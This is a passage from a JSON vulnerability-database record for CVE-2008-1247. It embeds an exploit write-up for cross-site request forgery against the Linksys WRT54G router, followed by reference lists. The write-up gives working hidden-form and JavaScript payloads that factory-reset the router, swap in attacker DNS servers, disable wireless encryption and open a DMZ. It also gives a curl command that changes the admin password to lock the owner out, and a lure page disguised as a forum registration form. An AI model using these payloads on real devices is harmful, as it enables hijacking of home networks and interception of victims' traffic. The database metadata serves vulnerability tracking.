\n\n\u003cform name=\"f\" action=\"http://192.168.1.1/WBasic.tri\" method=\"POST\"\u003e\n  \u003cinput type=\"hidden\" name=\"submit_type\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"channelno\" value=\"11\"\u003e\n  \u003cinput type=\"hidden\" name=\"OldWirelessMode\" value=\"3\"\u003e\n  \u003cinput type=\"hidden\" name=\"Mode\" value=\"3\"\u003e\n  \u003cinput type=\"hidden\" name=\"SSID\" value=\"kinqpinz\"\u003e\n  \u003cinput type=\"hidden\" name=\"channel\" value=\"6\"\u003e\n  \u003cinput type=\"hidden\" name=\"Freq\" value=\"6\"\u003e\n  \u003cinput type=\"hidden\" name=\"wl_closed\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"sesMode\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n\u003c/form\u003e\n\nWhat you should observe from this is the form name of \"f\" which is used in the JS to submit the form \nas well as the various \u0027name\u0027 and \u0027value\u0027 attributes that are used to create a URL such as this:\n\nsubmit_type=\u0026channelno=11\u0026OldWirelessMode=3\u0026Mode=3\u0026SSID=kinqpinz\u0026channel=6\u0026Freq=6\u0026wl_closed=1\u0026sesMode=1\u0026layout=en\n\nDo note that without any one of these parameters, the exploit fails and nothing changes. All of the \nelements must remain in place even if they do not directly make sense. They are simply options that \nthe processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case \nmatters and do not forget that the request must be POST, not GET. Also different config changes \nrequire different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log. \n\nNow that the malicious page has been composed and sits online living and waiting for marks at \nhttp://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom \nPHP logging script. In mark.txt, our logging file, sample output would resemble something like the \nfollowing. 
\n\nPotential mark resides at 1.1.1.1\n\nPotential mark resides at 2.2.2.2\n\nPotential mark resides at 3.3.3.3\n\nSo forth... \n\nThey are potential marks because it is unknown whether or not they are using the WRT54G with a \nsupported firmware version that is exploitable using these techniques, and/or the exploit attempt \nfailed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not \nusing the default local address (good for them) that this attack relies on. \n\nWhen they browse the page, because we have set no timeout for this change to occur, they are \ninstantly redirected to http://192.168.1.1/WBasic.tri. The URL, because it is not a GET request, \ndoes not inform the user if they were educated enough of what has just happened, so they may \ncontinue on doing whatever they were doing, more often than not unaware of what has just happened. \nAt the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at \nour leisure and further test the remote host whether or not they are vulnerable to attack. At the \nvery least, we may decide to completely reset the router to rest assured we know its current state \nto make further compromise a snap, such as altering the device\u0027s DNS records for sniffing traffic. \nThis is quite feasible, here\u0027s how. \n\n\u003cform method=\"post\" action=\"http://192.168.1.1/factdefa.tri\"\u003e\n  \u003cinput type=\"hidden\" name=\"FactoryDefaults\" value=\"Yes\"\u003e\n  \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n  \u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nThis gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes\u0026layout=en\n\nNow we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs \nall incoming and outgoing requests before passing them on to the next in line. 
\n\n\u003cform method=\"post\" action=\"http://192.168.1.1/Basic.tri\"\u003e\n  \u003cinput type=\"hidden\" name=\"dhcp_end\" value=\"149\"\u003e\n  \u003cinput type=\"hidden\" name=\"oldMtu\" value=\"1500\"\u003e\n  \u003cinput type=\"hidden\" name=\"oldLanSubnet\" value=\"0\"\u003e\n  \u003cinput type=\"hidden\" name=\"OldWanMode\" value=\"0\"\u003e\n  \u003cinput type=\"hidden\" name=\"SDHCP1\" value=\"192\"\u003e\n  \u003cinput type=\"hidden\" name=\"SDHCP2\" value=\"168\"\u003e\n  \u003cinput type=\"hidden\" name=\"SDHCP3\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"SDHCP4\" value=\"100\"\u003e\n  \u003cinput type=\"hidden\" name=\"EDHCP1\" value=\"192\"\u003e\n  \u003cinput type=\"hidden\" name=\"EDHCP2\" value=\"168\"\u003e\n  \u003cinput type=\"hidden\" name=\"EDHCP3\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"EDHCP4\" value=\"150\"\u003e\n  \u003cinput type=\"hidden\" name=\"pd\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"now_proto\" value=\"dhcp\"\u003e\n  \u003cinput type=\"hidden\" name=\"old_domain\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"chg_lanip\" value=\"192.168.1.1\"\u003e\n  \u003cinput type=\"hidden\" name=\"_daylight_time\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"wan_proto\" value=\"0\"\u003e\n  \u003cinput type=\"hidden\" name=\"router_name\" value=\"WRT54G\"\u003e\n  \u003cinput type=\"hidden\" name=\"wan_hostname\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"wan_domain\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"mtu_enable\" value=\"0\"\u003e\n  \u003cinput type=\"hidden\" name=\"lan_ipaddr_0\" value=\"192\"\u003e\n  \u003cinput type=\"hidden\" name=\"lan_ipaddr_1\" value=\"168\"\u003e\n  \u003cinput type=\"hidden\" name=\"lan_ipaddr_2\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"lan_ipaddr_3\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"lan_netmask\" value=\"0\"\u003e\n  \u003cinput type=\"hidden\" name=\"lan_proto\" 
value=\"Enable\"\u003e\n  \u003cinput type=\"hidden\" name=\"dhcp_start\" value=\"100\"\u003e\n  \u003cinput type=\"hidden\" name=\"dhcp_num\" value=\"50\"\u003e\n  \u003cinput type=\"hidden\" name=\"dhcp_lease\" value=\"0\"\u003e\n  \u003cinput type=\"hidden\" name=\"dns0_0\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"dns0_1\" value=\"2\"\u003e\n  \u003cinput type=\"hidden\" name=\"dns0_2\" value=\"3\"\u003e\n  \u003cinput type=\"hidden\" name=\"dns0_3\" value=\"4\"\u003e\n  \u003cinput type=\"hidden\" name=\"dns1_0\" value=\"5\"\u003e\n  \u003cinput type=\"hidden\" name=\"dns1_1\" value=\"6\"\u003e\n  \u003cinput type=\"hidden\" name=\"dns1_2\" value=\"7\"\u003e\n  \u003cinput type=\"hidden\" name=\"dns1_3\" value=\"8\"\u003e\n  \u003cinput type=\"hidden\" name=\"dns2_0\" value=\"9\"\u003e\n  \u003cinput type=\"hidden\" name=\"dns2_1\" value=\"8\"\u003e\n  \u003cinput type=\"hidden\" name=\"dns2_2\" value=\"7\"\u003e\n  \u003cinput type=\"hidden\" name=\"dns2_3\" value=\"6\"\u003e\n  \u003cinput type=\"hidden\" name=\"wins_0\" value=\"0\"\u003e\n  \u003cinput type=\"hidden\" name=\"wins_1\" value=\"0\"\u003e\n  \u003cinput type=\"hidden\" name=\"wins_2\" value=\"0\"\u003e\n  \u003cinput type=\"hidden\" name=\"wins_3\" value=\"0\"\u003e\n  \u003cinput type=\"hidden\" name=\"time_zone\" value=\"%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29\"\u003e\n  \u003cinput type=\"hidden\" name=\"daylight_time\" value=\"ON\"\u003e\n  \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n  \u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nThis is indeed convoluted but all of these values must be in place in order to be successful. What \nis it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our \nown custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, \nand DNS server #3 is set to 9.8.7.6. 
Typically these values are populated by the router itself while \nobtaining its dynamic IP from the ISP. In case you\u0027re curious, these forms are used to construct the \nfollowing URL that is submitted to http://192.168.1.1/Basic.tri. \n\nhttp://192.168.1.1/Basic.tri?dhcp_end=149\u0026oldMtu=1500\u0026oldLanSubnet=0\u0026OldWanMode=0\u0026SDHCP1=192\u0026SDHCP2=168\u0026SDHCP3=1\u0026SDHCP4=100\u0026EDHCP1=192\u0026EDHCP2=168\u0026EDHCP3=1\u0026EDHCP4=150\u0026pd=\u0026now_proto=dhcp\u0026old_domain=\u0026chg_lanip=192.168.1.1\u0026_daylight_time=1\u0026wan_proto=0\u0026router_name=WRT54G\u0026wan_hostname=\u0026wan_domain=\u0026mtu_enable=0\u0026lan_ipaddr_0=192\u0026lan_ipaddr_1=168\u0026lan_ipaddr_2=1\u0026lan_ipaddr_3=1\u0026lan_netmask=0\u0026lan_proto=Enable\u0026dhcp_start=100\u0026dhcp_num=50\u0026dhcp_lease=0\u0026dns0_0=1\u0026dns0_1=2\u0026dns0_2=3\u0026dns0_3=4\u0026dns1_0=5\u0026dns1_1=6\u0026dns1_2=7\u0026dns1_3=8\u0026dns2_0=9\u0026dns2_1=8\u0026dns2_2=7\u0026dns2_3=6\u0026wins_0=0\u0026wins_1=0\u0026wins_2=0\u0026wins_3=0\u0026time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29\u0026daylight_time=ON\u0026layout=en\n\n++| An Alternative (with JavaScript)\n----------------------\nThis is the basic exploitation method of the router although the attacker has many alternatives of \nsubmitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. 
\nA few alternative methods would include using a JavaScript onClick function within a standard \nlooking HTML anchor tag to submit the information with XMLHttpRequest, e.g.:\n\n\u003ca href=\"/path/\" onClick=\"xhrRequest();\"\u003eThis looks innocent enough.\u003c/a\u003e\n\n...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this \nstandard looking navigation link, e.g.:\n\nvar xhr=false;\nif(window.XMLHttpRequest) {\n  xhr=new XMLHttpRequest();\n} else if(window.ActiveXObject) {\n  xhr=new ActiveXObject(\"Microsoft.XMLHTTP\");\n}\nfunction xhrRequest() {\n  if(xhr) {\n    xhr.open(\"POST\", \"http://192.168.1.1/Security.tri\", true);\n    xhr.setRequestHeader(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027);\n    xhr.onreadystatechange=function() {\n      if(xhr.readyState == 4 \u0026\u0026 xhr.status == 200) {\n        var success=xhr.responseText;\n      }\n    };\n    xhr.send(\"SecurityMode=0\u0026layout=en\");\n  }\n}\n\nThe example above effectively disables all wireless encryption so that if you happen to live close \nenough to this poor individual, it is your duty to pwn their wireless by enabling open access for \neverybody in the neighborhood! Here\u0027s the URL for disabling wireless encryption:\n\nhttp://192.168.1.1/Security.tri?SecurityMode=0\u0026layout=en\n\n++| An Alternative (without JavaScript)\n----------------------\nYou\u0027re still exploitable even if you do not allow scripts to execute, e.g., you use Firefox + \nNoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent \nlooking methods of compromising your WRT54G. For example, user registration for a bulletin board or \nforum system. 
The site must acquire a minimal amount of information in order to create the account \nso it is in submitting this data that we may submit our own payload, perhaps this time we\u0027d like to \nenable DMZ for complete access to any and all shares/services on our mark\u0027s computer. Here is the \nURL once again:\n\nhttp://192.168.1.1/dmz.tri?action=Apply\u0026dmz_enable=1\u0026dmz_ipaddr=100\u0026layout=en\n\nAgain it is a different script processing the request on behalf of the router\u0027s internal operating \nsystem, dmz.tri, but it still does not require authentication prior to changing the settings we wish \nto change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.:\n\n\u003cform method=\"post\" action=\"http://192.168.1.1/dmz.tri\"\u003e\n  \u003cinput type=\"hidden\" name=\"action\" value=\"Apply\"\u003e\n  \u003cinput type=\"hidden\" name=\"dmz_enable\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"dmz_ipaddr\" value=\"100\"\u003e\n  \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n\n...and add these values to their user registration page with standard username/password/e-mail fields... \n \n Username: \u003cinput type=\"text\" name=\"username\"\u003e\u003cbr\u003e\n Password: \u003cinput type=\"password\" name=\"password1\"\u003e\u003cbr\u003e\n Confirm Password: \u003cinput type=\"password\" name=\"password2\"\u003e\u003cbr\u003e\n \u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\n...that can be found on traditional forums these days. The mark submits and exploits his/her own \nrouter although they believe they are at least minimally technically savvy by using a combination of \ntechnologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms \nwe use to store the router configs are hidden, and the normal user registration forms are not, thus \nthe nature of the supplementary data hacker.tld has appended is unknown. 
Even if the mark has \ndetected that a potential attack is taking place, it is likely too late as the mastermind behind \nhttp://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up \ntargets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration \nchanges within 10 seconds, which is plenty of time for them to open another terminal and change the \nadministrative login to block our mark from changing their settings, e.g.:\n\ncurl -d \"remote_mgt_https=0\u0026http_enable=1\u0026https_enable=0\u0026PasswdModify=1\u0026http_passwd=pwn\u0026http_passwdConfirm=pwn\u0026_http_enable=1\u0026web_wl_filter=1\u0026remote_management=0\u0026upnp_enable=1\u0026layout=en\" http://\u003cREMOTE_EXTERNAL_ADDR\u003e/manage.tri\n\nHere the hacker can now log in as admin with password \u0027pwn\u0027 with complete freedom to _REMOTELY_ \nmonitor the mark\u0027s internal and outgoing network traffic. This can allow for capturing passwords \nvia DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the \nrouter to a rogue DHCP server and, accordingly, to the attacker\u0027s rogue network, plus more. \n\n++| Conclusion\n----------------------\nIt is my intention in finalizing this document that the reader understands that the Linksys WRT54G \nfirmware version 1.00.9 does not care whether you are inside or outside its local network. Nor does it care \nwhether or not you have the level of privilege thought to be necessary for manipulating sensitive \nobjects. \n\nThanks go to hw2B for suggesting I write all of this garbage out. \n\n++| URLs\n----------------------\nhttps://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document)\nhttps://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008)\nhttps://kinqpinz.info/lib/wrt54g/own2.txt (this document)\nhttp://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2008-1247"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-004203"
      },
      {
        "db": "BID",
        "id": "28381"
      },
      {
        "db": "VULHUB",
        "id": "VHN-31372"
      },
      {
        "db": "PACKETSTORM",
        "id": "64785"
      },
      {
        "db": "PACKETSTORM",
        "id": "67644"
      }
    ],
    "trust": 2.16
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-31372",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-31372"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2008-1247",
        "trust": 3.0
      },
      {
        "db": "BID",
        "id": "28381",
        "trust": 2.0
      },
      {
        "db": "SECUNIA",
        "id": "29344",
        "trust": 1.8
      },
      {
        "db": "EXPLOIT-DB",
        "id": "5926",
        "trust": 1.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "5313",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-004203",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200803-125",
        "trust": 0.7
      },
      {
        "db": "BUGTRAQ",
        "id": "20080301 THE ROUTER HACKING CHALLENGE IS OVER!",
        "trust": 0.6
      },
      {
        "db": "MILW0RM",
        "id": "5313",
        "trust": 0.6
      },
      {
        "db": "MILW0RM",
        "id": "5926",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "54",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "41118",
        "trust": 0.6
      },
      {
        "db": "MISC",
        "id": "HTTP://KINQPINZ.INFO/LIB/WRT54G/OWN.TXT",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "67644",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "64904",
        "trust": 0.2
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-65280",
        "trust": 0.1
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-8833",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-31372",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "64785",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-31372"
      },
      {
        "db": "BID",
        "id": "28381"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-004203"
      },
      {
        "db": "PACKETSTORM",
        "id": "64904"
      },
      {
        "db": "PACKETSTORM",
        "id": "64785"
      },
      {
        "db": "PACKETSTORM",
        "id": "67644"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-1247"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200803-125"
      }
    ]
  },
  "id": "VAR-200803-0170",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-31372"
      }
    ],
    "trust": 0.6353147
  },
  "last_update_date": "2023-12-18T11:26:38.262000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linksys",
        "trust": 0.8,
        "url": "http://home.cisco.com/en-apac/home"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-004203"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-31372"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-004203"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-1247"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "http://kinqpinz.info/lib/wrt54g/own.txt"
      },
      {
        "trust": 1.9,
        "url": "https://kinqpinz.info/lib/wrt54g/"
      },
      {
        "trust": 1.8,
        "url": "https://kinqpinz.info/lib/wrt54g/own2.txt"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/28381"
      },
      {
        "trust": 1.7,
        "url": "http://www.gnucitizen.org/projects/router-hacking-challenge/"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/29344"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/archive/1/489009/100/0/threaded"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/5313"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/5926"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41118"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1247"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1247"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded"
      },
      {
        "trust": 0.6,
        "url": "http://www.milw0rm.com/exploits/5926"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/41118"
      },
      {
        "trust": 0.6,
        "url": "http://www.milw0rm.com/exploits/5313"
      },
      {
        "trust": 0.3,
        "url": "http://www.linksys.com"
      },
      {
        "trust": 0.2,
        "url": "http://192.168.1.1/security.tri?securitymode=0\u0026layout=en"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-1247"
      },
      {
        "trust": 0.2,
        "url": "http://192.168.1.1/factdefa.tri?factorydefaults=yes\u0026layout=en"
      },
      {
        "trust": 0.2,
        "url": "http://192.168.1.1/basic.tri?dhcp_end=149\u0026oldmtu=1500\u0026oldlansubnet=0\u0026oldwanmode=0\u0026sdhcp1=192\u0026sdhcp2=168\u0026sdhcp3=1\u0026sdhcp4=100\u0026edhcp1=192\u0026edhcp2=168\u0026edhcp3=1\u0026edhcp4=150\u0026pd=\u0026now_proto=dhcp\u0026old_domain=\u0026chg_lanip=192.168.1.1\u0026_daylight_time=1\u0026wan_proto=0\u0026router_name=wrt54g\u0026wan_hostname=\u0026wan_domain=\u0026mtu_enable=0\u0026lan_ipaddr_0=192\u0026lan_ipaddr_1=168\u0026lan_ipaddr_2=1\u0026lan_ipaddr_3=1\u0026lan_netmask=0\u0026lan_proto=enable\u0026dhcp_start=100\u0026dhcp_num=50\u0026dhcp_lease=0\u0026dns0_0=1\u0026dns0_1=2\u0026dns0_2=3\u0026dns0_3=4\u0026dns1_0=5\u0026dns1_1=6\u0026dns1_2=7\u0026dns1_3=8\u0026dns2_0=9\u0026dns2_1=8\u0026dns2_2=7\u0026dns2_3=6\u0026wins_0=0\u0026wins_1=0\u0026wins_2=0\u0026wins_3=0\u0026time_zone=%28gmt-08%3a00%29+pacific+time+%28usa+%26+canada%29\u0026daylight_time=on\u0026layout=en"
      },
      {
        "trust": 0.2,
        "url": "http://192.168.1.1/dmz.tri?action=apply\u0026dmz_enable=1\u0026dmz_ipaddr=100\u0026layout=en"
      },
      {
        "trust": 0.2,
        "url": "http://192.168.1.1/factdefa.tri\"\u003e"
      },
      {
        "trust": 0.2,
        "url": "http://192.168.1.1/basic.tri\"\u003e"
      },
      {
        "trust": 0.2,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-1247"
      },
      {
        "trust": 0.2,
        "url": "http://192.168.1.1/dmz.tri\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.intoto.com/company.shtml."
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/wfilter.tri"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/ctlog.tri\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/manage.tri\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/wfilter.tri?wl_macmode1=0"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/wbasic.tri"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/wbasic.tri\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/vpn.tri\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://kinqpinz.info/lib/wrt54g/,"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/manage.tri?remote_mgt_https=0\u0026http_enable=1\u0026https_enable=0\u0026passwdmodify=1\u0026http_passwd=asdf\u0026http_passwdconfirm=asdf\u0026_http_enable=1\u0026web_wl_filter=1\u0026remote_management=0\u0026upnp_enable=1\u0026layout=en"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/dmz.tri?action=apply\u0026dmz_enable=0\u0026layout=en"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/tracert.tri\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/config.bin\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/manage.tri"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/config.bin."
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/manage.tri?remote_mgt_https=0\u0026http_enable=1\u0026https_enable=0\u0026passwdmodify=1\u0026http_passwd=asdf\u0026http_passwdconfirm=asdf\u0026_http_enable=1\u0026web_wl_filter=1\u0026remote_management=1\u0026http_wanport=31337\u0026upnp_enable=1\u0026layout=en"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/factdefa.tri"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/wfilter.tri\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/basic.tri"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/rstatus.tri\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/wbasic.tri?submit_type=\u0026channelno=11\u0026oldwirelessmode=3\u0026mode=3\u0026ssid=pwnage\u0026channel=6\u0026freq=6\u0026wl_closed=1\u0026sesmode=1\u0026layout=en"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/ptrigger.tri\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/security.tri"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/dmz.tri"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/security.tri\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/ping.tri\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/basic.tri?dhcp_end=149\u0026oldmtu=1500\u0026oldlansubnet=0\u0026oldwanmode=0\u0026sdhcp1=192\u0026sdhcp2=168\u0026sdhcp3=1\u0026sdhcp4=100\u0026edhcp1=192\u0026edhcp2=168\u0026edhcp3=1\u0026edhcp4=150\u0026pd=\u0026now_proto=dhcp\u0026old_domain=\u0026chg_lanip=192.168.1.1\u0026_daylight_time=1\u0026wan_proto=0\u0026router_name=wrt54g\u0026wan_hostname=\u0026wan_domain=\u0026mtu_enable=0\u0026lan_ipaddr_0=192\u0026lan_ipaddr_1=168\u0026lan_ipaddr_2=1\u0026lan_ipaddr_3=1\u0026lan_netmask=0\u0026lan_proto=enable\u0026dhcp_start=100\u0026dhcp_num=50\u0026dhcp_lease=0\u0026dns0_0=0\u0026dns0_1=0\u0026dns0_2=0\u0026dns0_3=0\u0026dns1_0=0\u0026dns1_1=0\u0026dns1_2=0\u0026dns1_3=0\u0026dns2_0=0\u0026dns2_1=0\u0026dns2_2=0\u0026dns2_3=0\u0026wins_0=0\u0026wins_1=0\u0026wins_2=0\u0026wins_3=0\u0026time_zone=%28gmt-08%3a00%29+pacific+time+%28usa+%26+canada%29\u0026daylight_time=on\u0026layout=en"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/portrange.tri\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/29344/"
      },
      {
        "trust": 0.1,
        "url": "https://psi.secunia.com/?page=changelog"
      },
      {
        "trust": 0.1,
        "url": "https://psi.secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/3523/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "https://kinqpinz.info/"
      },
      {
        "trust": 0.1,
        "url": "http://www.hacker.tld/"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/basic.tri."
      },
      {
        "trust": 0.1,
        "url": "http://\u003cremote_external_addr\u003e/manage.tri"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/wbasic.tri."
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/wbasic.tri\""
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1."
      },
      {
        "trust": 0.1,
        "url": "https://kinqpinz.info/lib/wrt54g/."
      },
      {
        "trust": 0.1,
        "url": "http://www.hacker.tld/index.php"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/wbasic.tri?submit_type=\u0026channelno=11\u0026oldwirelessmode=3\u0026mode=3\u0026ssid=kinqpinz\u0026channel=6\u0026freq=6\u0026wl_closed=1\u0026sesmode=1\u0026layout=en"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/security.tri\","
      },
      {
        "trust": 0.1,
        "url": "http://www.hacker.tld/index.php,"
      },
      {
        "trust": 0.1,
        "url": "http://www.hacker.tld"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-31372"
      },
      {
        "db": "BID",
        "id": "28381"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-004203"
      },
      {
        "db": "PACKETSTORM",
        "id": "64904"
      },
      {
        "db": "PACKETSTORM",
        "id": "64785"
      },
      {
        "db": "PACKETSTORM",
        "id": "67644"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-1247"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200803-125"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
